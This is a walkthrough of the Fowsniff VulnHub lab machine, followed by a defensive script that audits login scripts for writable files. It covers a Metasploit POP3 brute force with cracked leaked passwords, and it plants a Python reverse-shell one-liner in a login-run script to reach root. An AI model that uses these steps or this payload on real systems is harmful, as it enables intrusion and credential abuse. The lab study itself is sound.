Fowsniff: 1 Vulnhub Walkthrough

Description

Hello, today I will write up the steps for my first VulnHub machine. There is only one vulnerable machine in the Fowsniff series, and it can be downloaded from VulnHub. In this article, we will walk through the solution to the Fowsniff machine.

Writeup

We opened the machine in VirtualBox. Next, we run the following command to learn the IP address of the vulnerable machine.

netdiscover

We learned the IP address of the vulnerable machine. The second thing we have to do is scan for open ports. For this, we will use the Nmap tool.

nmap -sV 192.168.1.3

We see that port 80 is open, but there is nothing on the site. To get more information, we need to scan for files and directories on the web server. As for the options in the command: -u gives the target's URL, -w the location of our wordlist, and -x the file extensions to try.

gobuster dir -u http://192.168.1.3 -w /usr/share/dirb/wordlists/common.txt -t 200 -x php,html,txt

When we review our Gobuster scan results, the /security.txt file gets our attention. Now it is time to open it, which we do by appending the path to the end of the machine's IP address.

The page reads “Fowsniff Corp got pwn3d by B1gN1nj4!” When we search for this text on Google, we find many usernames and passwords on a Pastebin site.

When we examine the passwords, we see that they are MD5 hashes. We need to crack these MD5 hashes to recover the passwords, then we will try the passwords to get into the system. We use a website for this, which turns the MD5 hashes into the passwords quickly and easily.

We will save usernames and passwords we find in one file.

After saving the usernames and passwords, we run the Metasploit tool. We will enter the commands in the code block below into Metasploit, in order. In this way, we will have tried the usernames and passwords we obtained.

You will remember from the Nmap port scan that port 110 (POP3) is open, so we will try these IDs and passwords there. Because the number is low, they could be tried manually, but I suggest doing it with Metasploit for practice.

msfconsole
use auxiliary/scanner/pop3/pop3_login
set RHOSTS 192.168.1.3
set user_file id.txt
set pass_file pass.txt
run

After a few minutes, depending on the processor speed of your computer, the tool finds the correct match.

We will connect with the Ncat tool and log in with the username and password that Metasploit matched.

nc 192.168.1.3 110
user seina
pass scoobydoo2
list

We used the list command above. This command shows whether there are any messages in the mailbox after logging in. According to the result, there are two messages. We enter the commands below to view them.

retr 1
retr 2

When we examine the messages, message 1 says the temporary password for SSH is “S1ck3nBluff + secureshell”, which tells us that the protocol to use is SSH. In message 2, we learn who the message was sent from. With this information, our next move is to make an SSH connection.

ssh [email protected]
Password : S1ck3nBluff+secureshell

We have successfully connected over SSH. Now we will search for the file behind the cube and Fowsniff text that appears at login and use it for the reverse shell.

find / -group users -type f 2>/dev/null

Open the file we found with vim and add the command shown below. Note that you need to change the IP address and port number in the command. Then save and exit the vim editor.

vim cube.sh

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We start listening with Ncat to complete the reverse shell. Then we disconnect the SSH session and log in again; since the cube.sh file is run at login, the Python shell that we added runs as well.

nc -lvnp 1234
ls
cd /root
cat flag.txt

We successfully completed a vulnhub machine solution and displayed the flag.
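
The last step works because a file that an unprivileged user can edit is run at login. As an added example (not part of the original walkthrough), the shell functions below audit a directory of login-banner scripts, and every file those scripts reference, for group or world write permission. The /etc/update-motd.d location and the 00-banner and helpers/ names in the constructed sample are assumptions.

```shell
#!/bin/sh
# Added example: flag login-banner scripts, and the files they call, that
# group or other users can modify.

# Succeeds if $1 is a regular file writable by group or others.
is_loosely_writable() {
    [ -n "$(find "$1" -prune -type f \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Print every absolute path mentioned in script $1, one per line.
referenced_paths() {
    grep -oE '/[A-Za-z0-9._/-]+' "$1" | sort -u
}

# audit_login_scripts DIR: report scripts in DIR and files they reference
# that a non-owner could edit.
audit_login_scripts() {
    dir=$1
    for script in "$dir"/*; do
        [ -f "$script" ] || continue
        if is_loosely_writable "$script"; then
            echo "WRITABLE-SCRIPT $script"
        fi
        for target in $(referenced_paths "$script"); do
            if is_loosely_writable "$target"; then
                echo "WRITABLE-TARGET $target (called from $script)"
            fi
        done
    done
}

# Constructed sample: a banner script (00-banner, hypothetical name) that
# calls a group-writable helper, mirroring the cube.sh situation.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/update-motd.d" "$tmp/helpers"
    printf '#!/bin/sh\nsh %s/helpers/cube.sh\n' "$tmp" > "$tmp/update-motd.d/00-banner"
    printf '#!/bin/sh\necho banner\n' > "$tmp/helpers/cube.sh"
    chmod 755 "$tmp/update-motd.d/00-banner"
    chmod 775 "$tmp/helpers/cube.sh"
    audit_login_scripts "$tmp/update-motd.d" | sed "s|$tmp||g"
    rm -rf "$tmp"
}

# Pass the directory to audit as the first argument, for example
# /etc/update-motd.d (assumed stock Ubuntu location).
if [ "$#" -gt 0 ]; then audit_login_scripts "$1"; fi
```

Any WRITABLE-TARGET line is a file to lock down with root ownership and mode 755 or stricter, or to stop calling from the login path.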
